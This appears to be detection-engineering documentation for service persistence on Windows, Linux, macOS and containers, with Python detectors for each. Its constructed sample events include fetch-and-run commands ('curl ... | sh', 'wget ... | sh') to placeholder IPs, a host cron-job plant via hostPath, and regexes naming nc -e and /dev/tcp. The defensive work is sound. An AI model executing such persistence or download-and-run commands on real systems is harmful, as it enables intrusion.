Detects command-line or API-based creation or modification of Windows services: sc.exe (create/config), PowerShell (New-Service/Set-Service), services.exe acting on a caller's behalf, or direct calls to CreateService/ChangeServiceConfig. Looks for new or reconfigured autostart services via registry changes under the Services key, binary drops into System32, and anomalous parent-child process trees (a service-management tool spawned by an Office application or script host). Security 4697 is only written when the "Audit Security System Extension" subcategory is enabled; the System log's 7045 ("A service was installed in the system") is logged by default and is the fallback source.

| Data Component | Name | Channel |
|---|---|---|
| Service Creation (DC0060) | WinEventLog:Security | EventCode=4697 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Windows Registry Key Modification (DC0063) | WinEventLog:Sysmon | EventCode=13 |

| Field | Description |
|---|---|
| ServiceNamePattern | Regex patterns to flag unusual service names or binaries |
| ParentProcessFilter | List of non-administrative processes that should never start service management tools |
| RegistryPathList | Monitored autorun locations (e.g., `HKLM\System\CurrentControlSet\Services`) |
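The three Windows sources above combined into one rule set, as an added example (not code from the analytic or from ATT&CK). It runs the ServiceNamePattern, ParentProcessFilter and RegistryPathList tunables over constructed Security 4697, Sysmon 1 and Sysmon 13 records; the parameter values, the allow-list of legitimate registry writers and the sample events are assumptions for illustration.

```python
import re

# Tunable parameters. The values below are illustrative assumptions for this example,
# not settings taken from the analytic itself.
SERVICE_NAME_PATTERN = re.compile(r'^(?:[a-f0-9]{16,}|.*[\s"\'].*)$')   # random hex, or whitespace/quotes in the name
USER_WRITABLE_PATH = re.compile(r"\\(Users\\[^\\]+|ProgramData|Windows\\Temp|Temp)\\", re.I)
LOLBIN_BINPATH = re.compile(r"\b(cmd|powershell|pwsh|rundll32|mshta|regsvr32)(\.exe)?\b", re.I)
PARENT_PROCESS_FILTER = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "mshta.exe", "wscript.exe"}
SERVICE_TOOLS = {"sc.exe", "powershell.exe", "pwsh.exe"}
SERVICE_VERBS = re.compile(r"\b(create|config|failure)\b|start=\s*auto|New-Service|Set-Service", re.I)
REGISTRY_PATH_LIST = ("HKLM\\System\\CurrentControlSet\\Services\\",)
# services.exe is the Service Control Manager; msiexec installs vendor services. Both are assumed legitimate writers.
REGISTRY_WRITERS_ALLOWED = {"c:\\windows\\system32\\services.exe", "c:\\windows\\system32\\msiexec.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_service_install(ev):
    """Security 4697: a service was installed. Flag odd names, user-writable binaries and LOLBin binPaths."""
    hits = []
    if SERVICE_NAME_PATTERN.match(ev["ServiceName"]):
        hits.append("odd-service-name")
    if USER_WRITABLE_PATH.search(ev["ServiceFileName"]):
        hits.append("user-writable-binary")
    if LOLBIN_BINPATH.search(ev["ServiceFileName"]):
        hits.append("lolbin-binpath")
    if hits and ev.get("ServiceStartType") == "2":   # 2 = SERVICE_AUTO_START: survives reboot
        hits.append("autostart")
    return hits


def check_process_create(ev):
    """Sysmon 1: a service-management tool invoked with a create/config verb from an unexpected parent."""
    if basename(ev["Image"]) not in SERVICE_TOOLS or not SERVICE_VERBS.search(ev["CommandLine"]):
        return []
    hits = []
    if basename(ev["ParentImage"]) in PARENT_PROCESS_FILTER:
        hits.append("service-tool-from-unexpected-parent")
    if USER_WRITABLE_PATH.search(ev["CommandLine"]):
        hits.append("user-writable-binary")
    return hits


def check_registry(ev):
    """Sysmon 13: a Services key written by something other than the SCM, or ImagePath pointed at user space."""
    target = ev["TargetObject"]
    if ev.get("EventType") != "SetValue" or not any(target.startswith(p) for p in REGISTRY_PATH_LIST):
        return []
    hits = []
    if ev["Image"].lower() not in REGISTRY_WRITERS_ALLOWED:
        hits.append("service-key-written-outside-scm")
    if target.endswith("\\ImagePath") and USER_WRITABLE_PATH.search(ev.get("Details", "")):
        hits.append("imagepath-in-user-writable-path")
    return hits


CHECKS = {("Security", 4697): check_service_install, ("Sysmon", 1): check_process_create, ("Sysmon", 13): check_registry}


def evaluate(events):
    """Run every event through the check registered for its channel/EventCode pair; return the alerts."""
    alerts = []
    for ev in events:
        fn = CHECKS.get((ev["Channel"], ev["EventCode"]))
        hits = fn(ev) if fn else []
        if hits:
            alerts.append({"EventCode": ev["EventCode"], "hits": hits})
    return alerts


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"Channel": "Security", "EventCode": 4697, "SubjectUserName": "alice", "ServiceName": "WinDefendUpd",
     "ServiceFileName": "C:\\Users\\alice\\AppData\\Roaming\\upd.exe", "ServiceStartType": "2"},
    {"Channel": "Sysmon", "EventCode": 1, "Image": "C:\\Windows\\System32\\sc.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "CommandLine": 'sc.exe create WinDefendUpd binPath= "C:\\Users\\alice\\AppData\\Roaming\\upd.exe" start= auto'},
    {"Channel": "Sysmon", "EventCode": 13, "EventType": "SetValue",
     "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\x.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Users\\alice\\AppData\\Local\\Temp\\x.exe"},
    {"Channel": "Security", "EventCode": 4697, "SubjectUserName": "SYSTEM", "ServiceName": "VendorAgent",
     "ServiceFileName": '"C:\\Program Files\\Vendor\\agent.exe"', "ServiceStartType": "2"},   # benign install
    {"Channel": "Sysmon", "EventCode": 1, "Image": "C:\\Windows\\System32\\sc.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "sc.exe query spooler"},  # read-only use
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The first three sample events are one chain (service registered from a user profile, the sc.exe call that did it from an Office parent, and an ImagePath rewrite by a Temp binary) and each fires on its own; the vendor install and the `sc query` pass clean, which is the usual check that the tunables are not too broad.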
Detects creation or modification of systemd service units, addition of cron jobs that run binaries at boot (@reboot entries), or suspicious writes to /etc/init.d/. Monitors chmod +x on newly dropped scripts and execution of systemctl or service, especially from parent processes that are neither root nor an expected management tool. User-level units under ~/.config/systemd/user, enabled with systemctl --user, need no root and should be watched with the same logic.

| Data Component | Name | Channel |
|---|---|---|
| File Modification (DC0061) | auditd:SYSCALL | write or rename to /etc/systemd/system or /etc/init.d |
| Command Execution (DC0064) | auditd:SYSCALL | execution of systemctl or service with enable/start/restart or daemon-reload |

| Field | Description |
|---|---|
| ServicePathRegex | Path-based filters to identify service unit files or init scripts |
| UserContextList | List of expected user contexts (audit UIDs) that normally perform service changes |
| CommandNameList | Binaries used to register/modify services |
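The Linux analytic applied to raw auditd output, as an added example that is not part of the analytic. It assumes two audit rules are in place, `-w /etc/systemd/system -p wa -k service_units` and `-a always,exit -F arch=b64 -S execve -F exe=/usr/bin/systemctl -k service_cmds`, groups SYSCALL/PATH/EXECVE records by event serial, applies the ServicePathRegex, UserContextList and CommandNameList tunables (values assumed here), and correlates a unit file written in one event with the `systemctl enable` that activates it in a later one. The log lines are constructed.

```python
import re
from collections import defaultdict

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
AUDIT_ID = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")

# Tunable parameters (illustrative assumptions, not values from the analytic)
SERVICE_PATH_REGEX = re.compile(r"^/etc/systemd/system/.+\.(service|timer)$|^/etc/init\.d/.+|^/etc/cron\.d/.+")
USER_CONTEXT_LIST = {"4294967295", "1002"}   # unset auid (boot, cron, package manager) and a config-management login
COMMAND_NAME_LIST = {"systemctl", "service", "chkconfig", "update-rc.d"}
MODIFY_VERBS = {"enable", "start", "restart", "daemon-reload", "edit", "link", "mask", "unmask"}


def parse_audit(lines):
    """Group raw auditd records by event serial; each event maps record type -> list of field dicts."""
    events = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = AUDIT_ID.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in KV.findall(line)}
        events[int(m.group(2))][fields["type"]].append(fields)
    return events


def detect(lines):
    """Return (event_id, rule, detail) for unit writes and service commands outside the expected contexts."""
    events = parse_audit(lines)
    alerts, new_units = [], {}
    for eid in sorted(events):
        ev = events[eid]
        sc = ev["SYSCALL"][0] if ev["SYSCALL"] else {}
        auid = sc.get("auid", "?")          # login UID survives sudo, unlike uid/euid
        for p in ev["PATH"]:
            name = p.get("name", "")
            if SERVICE_PATH_REGEX.match(name) and p.get("nametype") in {"CREATE", "NORMAL", "DELETE"}:
                new_units[name.rsplit("/", 1)[-1]] = eid
                if auid not in USER_CONTEXT_LIST:
                    alerts.append((eid, "unit-file-write-unexpected-auid",
                                   f"auid={auid} exe={sc.get('exe')} path={name}"))
        for ex in ev["EXECVE"]:
            argv = [ex[f"a{i}"] for i in range(int(ex.get("argc", 0))) if f"a{i}" in ex]
            if not argv or argv[0].rsplit("/", 1)[-1] not in COMMAND_NAME_LIST:
                continue
            if not MODIFY_VERBS.intersection(argv[1:]):
                continue                     # status/list-units etc. are read-only
            if auid not in USER_CONTEXT_LIST:
                alerts.append((eid, "service-modify-unexpected-auid", f"auid={auid} argv={' '.join(argv)}"))
            for unit in argv[1:]:
                if unit in new_units:
                    alerts.append((eid, "new-unit-enabled", f"{unit} written in event {new_units[unit]}"))
    return alerts


SAMPLE_LOG = [  # constructed auditd records, not real telemetry
    'type=SYSCALL msg=audit(1700000000.101:2001): arch=c000003e syscall=257 success=yes exit=3 ppid=1401 pid=1422 '
    'auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="bash" exe="/usr/bin/bash" key="service_units"',
    'type=PATH msg=audit(1700000000.101:2001): item=1 name="/etc/systemd/system/kworker-update.service" '
    'inode=1234 dev=fd:01 mode=0100644 ouid=0 ogid=0 nametype=CREATE',
    'type=SYSCALL msg=audit(1700000000.205:2002): arch=c000003e syscall=59 success=yes exit=0 ppid=1422 pid=1430 '
    'auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="systemctl" exe="/usr/bin/systemctl" key="service_cmds"',
    'type=EXECVE msg=audit(1700000000.205:2002): argc=3 a0="systemctl" a1="enable" a2="kworker-update.service"',
    # config-management user (auid 1002) deploying a unit: expected, no alert
    'type=SYSCALL msg=audit(1700000000.300:2003): arch=c000003e syscall=257 success=yes exit=4 ppid=2100 pid=2200 '
    'auid=1002 uid=0 gid=0 euid=0 tty=(none) ses=4 comm="python3" exe="/usr/bin/python3.11" key="service_units"',
    'type=PATH msg=audit(1700000000.300:2003): item=1 name="/etc/systemd/system/app.service" '
    'inode=5678 dev=fd:01 mode=0100644 ouid=0 ogid=0 nametype=CREATE',
    # read-only systemctl use by an ordinary user: no alert
    'type=SYSCALL msg=audit(1700000000.400:2004): arch=c000003e syscall=59 success=yes exit=0 ppid=3000 pid=3001 '
    'auid=1001 uid=1001 gid=1001 euid=1001 tty=pts1 ses=5 comm="systemctl" exe="/usr/bin/systemctl" key="service_cmds"',
    'type=EXECVE msg=audit(1700000000.400:2004): argc=3 a0="systemctl" a1="status" a2="sshd"',
]

if __name__ == "__main__":
    for eid, rule, detail in detect(SAMPLE_LOG):
        print(eid, rule, detail)
```

Keying on `auid` rather than `uid` is the point of UserContextList: the unit in event 2001 was written as root, but the audit UID shows it was an interactive login (1000) that escalated, while the config-management write in 2003 is the same syscall from an expected context.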
Detects creation or modification of LaunchDaemon or LaunchAgent property lists under /Library/LaunchDaemons/, /Library/LaunchAgents/, ~/Library/LaunchAgents/, or similar. Monitors execution of launchctl (load/unload and the newer bootstrap/bootout subcommands), edits to plist keys, and file permission changes.

| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | macos:unifiedlog | launchctl load/unload (or bootstrap/bootout) or plist file modification |
| File Modification (DC0061) | fs:fsusage | file write to launchd plist paths |

| Field | Description |
|---|---|
| PlistPathList | Watched directories for LaunchDaemons and LaunchAgents |
| PlistKeyMonitor | Monitored keys such as `RunAtLoad`, `KeepAlive`, or `ProgramArguments` |
| UnsignedBinaryAlert | Flag execution of unsigned or non-Apple-signed binaries referenced by the plist |
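A plist-level analyzer for the macOS sources above, as an added example (not code from the analytic). It parses real plist bytes with `plistlib`, restricts itself to the PlistPathList directories, reads the PlistKeyMonitor keys, and flags the properties that separate a persistence plant from a vendor agent: a program outside trusted locations or in a user-writable path, an interpreter given an inline command, a hidden binary, or an Apple-namespaced label dropped into a user's LaunchAgents. The path globs, trusted prefixes and sample plists are assumptions; the UnsignedBinaryAlert check shells out to `codesign --verify --strict` and returns None where that tool does not exist.

```python
import fnmatch
import os
import plistlib
import re
import shutil
import subprocess

# Tunable parameters (illustrative assumptions, not values from the analytic)
PLIST_PATH_LIST = ("/Library/LaunchDaemons/*.plist", "/Library/LaunchAgents/*.plist",
                   "/Users/*/Library/LaunchAgents/*.plist")
PLIST_KEY_MONITOR = ("RunAtLoad", "KeepAlive", "Program", "ProgramArguments", "StartInterval", "WatchPaths")
TRUSTED_PROGRAM_PREFIXES = ("/System/", "/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                            "/Library/Apple/", "/Applications/")
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "osascript", "perl", "ruby"}
USER_WRITABLE = re.compile(r"^(/tmp/|/private/tmp/|/var/tmp/|/Users/[^/]+/)")


def in_watched_dir(path):
    return any(fnmatch.fnmatch(path, pat) for pat in PLIST_PATH_LIST)


def program_of(plist):
    """launchd runs Program when set, otherwise ProgramArguments[0]."""
    args = list(plist.get("ProgramArguments") or [])
    return plist.get("Program") or (args[0] if args else ""), args


def analyze_plist(path, data):
    plist = plistlib.loads(data)
    program, args = program_of(plist)
    label = str(plist.get("Label", ""))
    base = os.path.basename(program)
    findings = []
    if plist.get("RunAtLoad"):
        findings.append("autostart")
    if plist.get("KeepAlive"):              # bool or a dict of conditions; either keeps the job alive
        findings.append("keepalive")
    if "." not in label:
        findings.append("label-not-reverse-dns")
    if label.startswith("com.apple.") and path.startswith("/Users/"):
        findings.append("apple-label-in-user-agent")
    if program and not program.startswith(TRUSTED_PROGRAM_PREFIXES):
        findings.append("program-outside-trusted-dirs")
    if USER_WRITABLE.match(program):
        findings.append("program-in-user-writable-path")
    if base in INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        findings.append("interpreter-inline-command")
    if base.startswith("."):
        findings.append("hidden-program")
    # autostart/keepalive alone are normal for agents; anything else makes the plist worth a look
    suspicious = bool(set(findings) - {"autostart", "keepalive"})
    return {"path": path, "label": label, "program": program,
            "monitored_keys": {k: plist[k] for k in PLIST_KEY_MONITOR if k in plist},
            "findings": findings, "suspicious": suspicious}


def codesign_ok(program):
    """UnsignedBinaryAlert: True/False from codesign on macOS, None where the tool is absent."""
    if not shutil.which("codesign"):
        return None
    return subprocess.run(["codesign", "--verify", "--strict", program], capture_output=True).returncode == 0


def scan(files):
    """files: iterable of (path, plist_bytes), as a file-write feed over the watched directories would supply."""
    return [analyze_plist(p, d) for p, d in files if in_watched_dir(p)]


SAMPLE_FILES = [  # constructed plists, serialized so the parser sees real plist bytes
    ("/Users/alice/Library/LaunchAgents/com.apple.update.plist", plistlib.dumps({
        "Label": "com.apple.update", "RunAtLoad": True, "KeepAlive": True,
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://203.0.113.7/u.sh | sh"]})),
    ("/Library/LaunchDaemons/com.vendor.agent.plist", plistlib.dumps({
        "Label": "com.vendor.agent", "RunAtLoad": True,
        "Program": "/Applications/Vendor.app/Contents/MacOS/agent"})),
    ("/Users/alice/Library/LaunchAgents/updater.plist", plistlib.dumps({
        "Label": "updater", "RunAtLoad": True, "KeepAlive": {"SuccessfulExit": False},
        "ProgramArguments": ["/Users/alice/.cache/.updater", "--daemon"]})),
    ("/Users/alice/Documents/notes.plist", plistlib.dumps({"Label": "x"})),   # outside watched dirs: ignored
]

if __name__ == "__main__":
    for r in scan(SAMPLE_FILES):
        print(r["path"], r["suspicious"], r["findings"])
```

The vendor daemon is the control case: `RunAtLoad` on its own is what every legitimate agent sets, so the analyzer only escalates when a second property (location, interpreter, hidden file, label spoofing) is present.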
Detects creation of container processes that persist across restarts (docker run --restart), commands injected into init containers (for example through kubectl exec), or modification of container init specs. Flags container images or run configurations that override the image entrypoint to embed persistence behaviour.

| Data Component | Name | Channel |
|---|---|---|
| Container Creation (DC0072) | docker:events | container create with restart=always or a modified init (the event names only image, container and labels; restart policy and entrypoint are read with docker inspect) |
| File Modification (DC0061) | auditd:SYSCALL | modification of entrypoint scripts or init containers |

| Field | Description |
|---|---|
| EntrypointOverridePattern | Patterns used to detect modified container start scripts |
| RestartPolicyMatch | Policy values triggering alert (e.g., always, on-failure) |
| KubeInitModPath | Path filters for `/etc/init.d/`-like locations written from inside containers |
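The container analytic as an added example (not code from the analytic): a `docker events` stream triggers on container create, the container's `docker inspect` record is compared against the image's config for RestartPolicyMatch and EntrypointOverridePattern, and a Kubernetes pod spec is checked for init containers that touch KubeInitModPath locations, especially through a writable hostPath volume. The event lines, inspect records, pod spec and tunable values are all constructed for illustration; the field layout follows the JSON that `docker events --format '{{json .}}'` and `docker inspect` emit.

```python
import json
import re

# Tunable parameters (illustrative assumptions, not values from the analytic)
RESTART_POLICY_MATCH = {"always", "unless-stopped"}
ENTRYPOINT_OVERRIDE_PATTERN = re.compile(
    r"(curl|wget)\s[^|;]*\|\s*(ba)?sh|base64\s+(-d|--decode)|nc\s+-e|/dev/tcp/|python[23]?\s+-c")
KUBE_INIT_MOD_PATH = re.compile(r"/etc/(init\.d|rc\.local|rc\d?\.d|cron\.d|crontab|profile\.d|systemd)")


def argv_text(*parts):
    """Flatten entrypoint/cmd (or command/args) lists into one string for pattern matching."""
    return " ".join(a for part in parts for a in (part or []))


def check_container(inspect, image_inspect):
    """Compare a container's effective config (docker inspect) against the config baked into its image."""
    findings = []
    policy = inspect["HostConfig"]["RestartPolicy"]["Name"]
    if policy in RESTART_POLICY_MATCH:
        findings.append(f"restart-policy:{policy}")
    cfg, img = inspect["Config"], image_inspect["Config"]
    if (cfg.get("Entrypoint") or []) != (img.get("Entrypoint") or []):
        findings.append("entrypoint-overridden")
    cmdline = argv_text(cfg.get("Entrypoint"), cfg.get("Cmd"))
    if ENTRYPOINT_OVERRIDE_PATTERN.search(cmdline):
        findings.append("entrypoint-downloads-and-executes")
    if KUBE_INIT_MOD_PATH.search(cmdline):
        findings.append("entrypoint-touches-init-path")
    for m in inspect.get("Mounts", []):   # a writable bind mount of a host init path is persistence on the host
        if m.get("Type") == "bind" and m.get("RW") and KUBE_INIT_MOD_PATH.search(m.get("Source", "")):
            findings.append(f"host-init-path-mounted-rw:{m['Source']}")
    return findings


def check_pod(pod):
    """Kubernetes: init containers that write init/cron paths, above all through a hostPath volume."""
    findings = []
    spec = pod["spec"]
    host_vols = {v["name"]: v["hostPath"]["path"] for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("initContainers", []):
        cmdline = argv_text(c.get("command"), c.get("args"))
        if ENTRYPOINT_OVERRIDE_PATTERN.search(cmdline):
            findings.append(f"{c['name']}:init-downloads-and-executes")
        if KUBE_INIT_MOD_PATH.search(cmdline):
            findings.append(f"{c['name']}:init-touches-init-path")
        for vm in c.get("volumeMounts", []):
            if vm["name"] in host_vols and not vm.get("readOnly", False):
                findings.append(f"{c['name']}:hostpath-rw:{host_vols[vm['name']]}")
    return findings


def process_events(event_lines, inspect_by_id, image_by_ref):
    """docker events only identifies the container; policy and entrypoint come from the inspect record."""
    alerts = []
    for line in event_lines:
        ev = json.loads(line)
        if ev.get("Type") != "container" or ev.get("Action") != "create":
            continue
        cid, attrs = ev["Actor"]["ID"], ev["Actor"]["Attributes"]
        findings = check_container(inspect_by_id[cid], image_by_ref[attrs["image"]])
        if findings:
            alerts.append({"container": attrs["name"], "findings": findings})
    return alerts


# Constructed sample data shaped like `docker events --format '{{json .}}'`, `docker inspect` and a pod manifest
EVENTS = [
    '{"Type":"container","Action":"create","Actor":{"ID":"c1","Attributes":{"image":"nginx:1.25","name":"web"}}}',
    '{"Type":"container","Action":"start","Actor":{"ID":"c1","Attributes":{"image":"nginx:1.25","name":"web"}}}',
    '{"Type":"container","Action":"create","Actor":{"ID":"c2","Attributes":{"image":"redis:7","name":"cache"}}}',
]
IMAGES = {
    "nginx:1.25": {"Config": {"Entrypoint": ["/docker-entrypoint.sh"], "Cmd": ["nginx", "-g", "daemon off;"]}},
    "redis:7": {"Config": {"Entrypoint": ["docker-entrypoint.sh"], "Cmd": ["redis-server"]}},
}
INSPECT = {
    "c1": {"HostConfig": {"RestartPolicy": {"Name": "always"}},
           "Config": {"Entrypoint": ["/bin/sh", "-c", "wget -qO- http://203.0.113.5/p.sh | sh; "
                                     "exec /docker-entrypoint.sh nginx -g 'daemon off;'"], "Cmd": None},
           "Mounts": [{"Type": "bind", "Source": "/etc/cron.d", "Destination": "/host-cron", "RW": True}]},
    "c2": {"HostConfig": {"RestartPolicy": {"Name": "no"}},
           "Config": {"Entrypoint": ["docker-entrypoint.sh"], "Cmd": ["redis-server"]}, "Mounts": []},
}
POD = {"metadata": {"name": "web"}, "spec": {
    "volumes": [{"name": "hostetc", "hostPath": {"path": "/etc"}}],
    "initContainers": [{"name": "init", "image": "busybox",
                        "command": ["sh", "-c", "echo '*/5 * * * * root /usr/local/bin/sync' > /host/etc/cron.d/sync"],
                        "volumeMounts": [{"name": "hostetc", "mountPath": "/host/etc"}]}],
    "containers": [{"name": "web", "image": "nginx:1.25"}]}}

if __name__ == "__main__":
    print(process_events(EVENTS, INSPECT, IMAGES))
    print(check_pod(POD))
```

Diffing the container's entrypoint against the image's is what separates a `--entrypoint` override at run time from a persistence mechanism baked into the image; the latter needs image-level scanning, which this example does not attempt.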